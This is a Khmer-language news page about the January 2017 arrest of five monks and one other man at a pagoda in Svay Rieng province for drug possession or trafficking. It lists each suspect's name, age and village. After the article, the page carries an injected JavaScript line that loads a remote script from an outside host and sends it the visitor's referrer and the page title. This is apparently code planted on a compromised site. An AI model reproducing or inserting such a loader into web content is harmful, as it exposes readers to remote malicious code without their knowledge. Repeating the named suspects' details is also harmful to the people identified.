Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ឃាត់ខ្លួនព្រះសង្ឃ៥អង្គ និងជនសង្ស័យម្នាក់ ករណីរក្សាទុក និងជួញដូរគ្រឿងញៀន!

ខេត្តស្វាយរៀង៖ គ្រឿងញៀនកំពុងវាយលុកដល់ទីអារ៉ាម
នៅវេលាម៉ោង១៦និង៣០ នាទី ថ្ងៃទី០២ ខែមករា ឆ្នាំ ២០១៧ កម្លាំងមន្ទីរយុត្តិធម៌សហការជាមួយកម្លាំងមូលដ្ឋានកងរាជអាវុធហត្ថក្រុងបាវិត និងកម្លាំងមូលដ្ឋានកងរាជអាវុធហត្ថស្រុកស្វាយទាប ដឹកនាំដោយលោកវរសេនីយ៍ឯក ស្រី វុត្ថា មេបញ្ជាការរងកងរាជអាវុធហត្ថខេត្ត និងមានការសម្របសម្រួលនិតិវិធីពីលោក គង់ ចន្ទ័ខេមរិទ្ធ តំណាងអយ្យការអមសាលាដំបូងខេត្តស្វាយរៀងបានធ្វើប្រត្តិបត្តការបង្ក្រាបករណី រក្សាទុកឬ ជួញដូរ ដោយខុសច្បាប់នូវសារធាតុញៀន នៅចំណុចវត្តសុវណ្ណរង្សី ស្ថិតនៅក្នុងភូមិថ្នល់ ឃុំពពែត ស្រុកស្វាយទាប ខេត្តស្វាយរៀង ឃាត់ខ្លួនជនសង្ស័យបានចំនួន ០៦ នាក់ ÷ក្នុងនោះមានព្រះសង្ឃចំនួន ០៥ អង្គ និងមានការចូលរួមពីអាជ្ញាធរមូលដ្ឋាន និងប្រធានមន្ទីរធម្មការ និងសាសនាខេត្ត និងព្រះចៅអធិការវត្តតានូ ជាអនុគុណស្រុកស្វាយទាប ចូលរួមធ្វើការឆែកឆេរ នឹងផ្សឹកលោកសង្ឃទាំង០៥ អង្គប្រគល់អោយសមត្ថកិច្ចចាត់ការតាមនីតិវិធី
១/ឈ្មោះ ឃឹម ថន ភេទប្រុស អាយុ២៦ ឆ្នាំ ជនជាតិខ្មែរ មុខរបរជាព្រះសង្ឃ ស្នាក់នៅវត្តសុវណ្ណរង្សី មានទីលំនៅបច្ចុប្បន្ន ភូមិថ្នល់កែង ឃុំពពែត ស្រុកស្វាយទាប ខេត្តស្វាយរៀង
២/ឈ្មោះ រុន រស្មី ភេទ ភេទប្រុស អាយុ ២៣ ឆ្នាំ ជនជាតិខ្មែរ មុខរបរជាព្រះសង្ឃ ស្នាក់នៅវត្តសុវណ្ណរង្សី មានទីលំនៅភូមិថ្នល់កែង ឃុំពពែត ស្រុកស្វាយទាប ខេត្តស្វាយរៀង
៣/ឈ្មោះ មុំ រ៉ាវី ភេទប្រុស អាយុ២២ ឆ្នាំ មុខរបរជាព្រះសង្ឃ ស្នាក់នៅវត្តសុវណ្ណរង្សី មានទីលំនៅភូមិថ្នល់កែង ឃុំពពែត ស្រុកស្វាយទាប ខេត្តស្វាយរៀង
៤ឈ្មោះ សូ រត្តនៈ ភេទប្រុស អាយុ ២០ ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ ជាព្រះសង្ឃ ស្នាក់នៅវត្តសុវណ្ណរង្សី មានទីលំនៅភូមិថ្នល់កែង ឃុំពពែត ស្រុកស្វាយទាប ខេត្តស្វាយរៀង
៥ ឈ្មោះ សេង ឌី ភេទប្រុស អាយុ២០ ឆ្នាំ ជនជាតិខ្មែរ មុខរបរជាព្រះសង្ឃ ស្នាក់នៅវត្តសុវណ្ណរង្សី មានទីលំនៅភូមិថ្នល់កែង ឃុំពពែត ស្រុកស្វាយទាប ខេត្តស្វាយរៀង
៦ ឈ្មោះ មោគ សាមាន ភេទប្រុស អាយុ ២៩ ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ មិនពិតប្រាកដ មានទីលំនៅភូមិថ្នល់កែង ឃុំពពែត ស្រុកស្វាយទាប ខេត្តស្វាយរៀង
ដកហូតវត្ថុតាងរួមមាន :
– ម្ស៉ៅក្រាមពណ៌ស ចំនួន ០៨ កញ្ចប់ មានទម្ងន់ ៣,១៥ ក្រាម ( គិតទាំងសំបកកញ្ចប់ )។
-ទូរសព្ទ័ដៃចំនួន០៨ កាំបិតចំនួន០១ដែកកេះចំនួន០៦
សម្ភារៈសម្រាប់ប្រើប្រាស់គ្រឿងញៀនមួយចំនួន។

បច្ចុប្បន្ន ជនសង្ស័យកំពុងឃាត់ខ្លួនបណ្តោះអាសន្ន នៅបញ្ជាការដ្ថានកងរាជអាវុធហត្ថខេត្ត ដើម្បីកសាងសំណុំរឿងតាមនីតិវិធី ៕

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More